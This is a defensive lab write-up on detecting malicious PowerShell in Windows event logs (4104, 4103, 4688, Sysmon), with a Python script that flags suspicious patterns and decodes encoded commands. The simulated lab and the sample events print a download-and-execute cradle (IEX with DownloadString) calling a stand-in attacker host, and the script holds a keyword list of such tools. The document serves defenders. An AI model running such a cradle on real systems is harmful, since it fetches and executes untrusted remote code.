Day 20 – Detecting Malicious PowerShell in Windows Logs

Objective: Identify and investigate suspicious PowerShell activity in Windows event logs.

Challenge Description: Imagine the phishing email's attachment was a Windows Office document that executed a hidden PowerShell payload (via macros). You need to find traces of this in Windows logs. The focus is on PowerShell logging, i.e. the script content and the commands that were run, to catch malicious scripts.

Tools: Windows Event Viewer or exported .evtx logs. Ensure PowerShell logging is enabled (Module Logging, Script Block Logging). If Sysmon is installed, check its logs (Event ID 1 for process creation); the Windows Security log records process creation as Event ID 4688. Otherwise, use the Windows PowerShell logs (Applications and Services Logs → Windows PowerShell).

Steps to Solve:
1. Enable/Check PowerShell logging: Ensure module and script block logging are on (Events 4103, 4104). Look in the Windows PowerShell event log for Event ID 4104, which contains the full PowerShell script text[19].
2. Search for known patterns: In the logs, search for suspicious keywords (such as Invoke-Expression, IEX, or the domains/IPs already seen as IOCs). You may find encoded or obfuscated commands in the script block events[20].
3. Check process creation: Look at the Security log (4688) or Sysmon Event ID 1 for a powershell.exe invocation with unusual command-line arguments (e.g. -WindowStyle Hidden, -EncodedCommand).
4. Extract the script: If you find an Event 4104 entry, copy the script contents. Decode any Base64 blocks to see the real commands. This reveals the attacker's actions (downloading malware, spawning shells, etc.).
5. Log IOCs: Record any malicious domains, IPs, file paths, or suspicious PowerShell command strings.
6. Respond: Block any malicious URLs/IPs, create detection rules for the discovered commands, and remove the malicious script from endpoints.

Simulated Lab: Event Viewer shows several Windows PowerShell events around the attack time. An Event ID 4104 entry contains:

IEX (New-Object Net.WebClient).DownloadString('http://evil.example.com/payload.ps1')

This raw command appeared because Script Block Logging was enabled[19]. You also find an Event ID 4103 (module logging) entry showing the Invoke-Expression usage. The script tried to download a payload from evil.example.com (IOC) and execute it.

Separately, the Security log has an event 4688:

A new process has been created: Process Name: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Command Line: powershell.exe -NoProfile -EncodedCommand SQBuAG...

Decoding the Base64 reveals another obfuscated payload download. You note both the URL and the full decoded script, saving them as evidence.

To ensure future detection, you enable PowerShell logging on all endpoints and add a SIEM alert for any 4104 script block containing DownloadString or a suspicious Base64 blob[20][19]. The malicious PowerShell artifacts (script text, domains, downloaded file hash) are added to the IOC list.
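As an added example (not part of the original challenge or its lab), the following Python script implements the checks from steps 2 to 4 and the SIEM rule just described: it scans 4104 script text and 4688/Sysmon command lines for the suspicious strings the challenge names, decodes -EncodedCommand payloads (PowerShell encodes them as Base64 over UTF-16LE, and it also accepts the abbreviated -e, -ec and -enc forms, which the example handles as well), and matches the evil.example.com IOC from the lab. The sample event records, the pattern labels and the function names are my own constructions; in practice the records would be exported from the event log.

```python
import base64
import binascii
import re

# Suspicious PowerShell patterns to look for in 4104 script text and in
# 4688/Sysmon command lines. The keys are the labels reported to the analyst.
SUSPICIOUS_PATTERNS = {
    "Invoke-Expression": re.compile(r"\bInvoke-Expression\b", re.IGNORECASE),
    "IEX": re.compile(r"\bIEX\b", re.IGNORECASE),
    "DownloadString": re.compile(r"\.DownloadString\(", re.IGNORECASE),
    "Net.WebClient": re.compile(r"\bNet\.WebClient\b", re.IGNORECASE),
    # PowerShell accepts any unambiguous prefix of -EncodedCommand (-e, -ec, -enc).
    "-EncodedCommand": re.compile(r"-(?:EncodedCommand|enc|ec|e)\s+[A-Za-z0-9+/=]{20,}", re.IGNORECASE),
    "-WindowStyle Hidden": re.compile(r"-WindowStyle\s+Hidden", re.IGNORECASE),
}

# IOC taken from the lab walkthrough; a real deployment would load the full IOC list.
KNOWN_BAD_DOMAINS = {"evil.example.com"}

# Captures the Base64 argument that follows -EncodedCommand or one of its short forms.
ENCODED_ARG = re.compile(r"-(?:EncodedCommand|enc|ec|e)\s+([A-Za-z0-9+/=]+)", re.IGNORECASE)


def encode_command(script: str) -> str:
    """Produce the Base64 form PowerShell expects for -EncodedCommand (UTF-16LE text)."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def decode_encoded_command(command_line: str):
    """Return the script hidden behind -EncodedCommand, or None if absent or undecodable."""
    m = ENCODED_ARG.search(command_line)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (binascii.Error, UnicodeDecodeError):
        return None


def find_indicators(text: str) -> list:
    """Labels of every suspicious pattern present in the text, in table order."""
    return [name for name, rx in SUSPICIOUS_PATTERNS.items() if rx.search(text)]


def find_iocs(text: str) -> list:
    """Known-bad domains mentioned anywhere in the text (case-insensitive)."""
    lowered = text.lower()
    return sorted(d for d in KNOWN_BAD_DOMAINS if d in lowered)


def analyze_event(event: dict) -> dict:
    """Score one record: 4104 script text, or a 4688 / Sysmon 1 command line."""
    text = event["text"]
    decoded = decode_encoded_command(text) if event["id"] in (1, 4688) else None
    # Search both the raw line and the decoded payload so encoding hides nothing.
    haystack = text if decoded is None else text + "\n" + decoded
    return {
        "event_id": event["id"],
        "indicators": find_indicators(haystack),
        "iocs": find_iocs(haystack),
        "decoded": decoded,
    }


def analyze_events(events) -> list:
    """Return only the records that deserve an analyst's attention."""
    results = [analyze_event(e) for e in events]
    return [r for r in results if r["indicators"] or r["iocs"]]


# Constructed sample records mirroring the lab: a 4104 script block, a 4688 process
# creation carrying an encoded command, and a benign 4104 block that must not alert.
STAGE2 = "IEX (New-Object Net.WebClient).DownloadString('http://evil.example.com/stage2.ps1')"
SAMPLE_EVENTS = [
    {"id": 4104, "text": "IEX (New-Object Net.WebClient).DownloadString('http://evil.example.com/payload.ps1')"},
    {"id": 4688, "text": "powershell.exe -NoProfile -EncodedCommand " + encode_command(STAGE2)},
    {"id": 4104, "text": "Get-ChildItem C:\\Users | Sort-Object Name"},
]

if __name__ == "__main__":
    for finding in analyze_events(SAMPLE_EVENTS):
        print(finding)
```

Running the script reports the two malicious records with their matched labels, the IOC and the decoded stage-two download, and stays silent on the benign directory listing. The decoded text is what goes into the evidence notes and the IOC list; the matched labels are the strings a SIEM rule on 4104/4688 events would key on.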

Key Citations: PowerShell Script Block Logging (Event ID 4104) provides raw, deobfuscated script content, giving defenders visibility into the commands executed[19]. Analysts should export and query these 4104 logs for suspicious strings, including Base64-encoded commands[20][19].
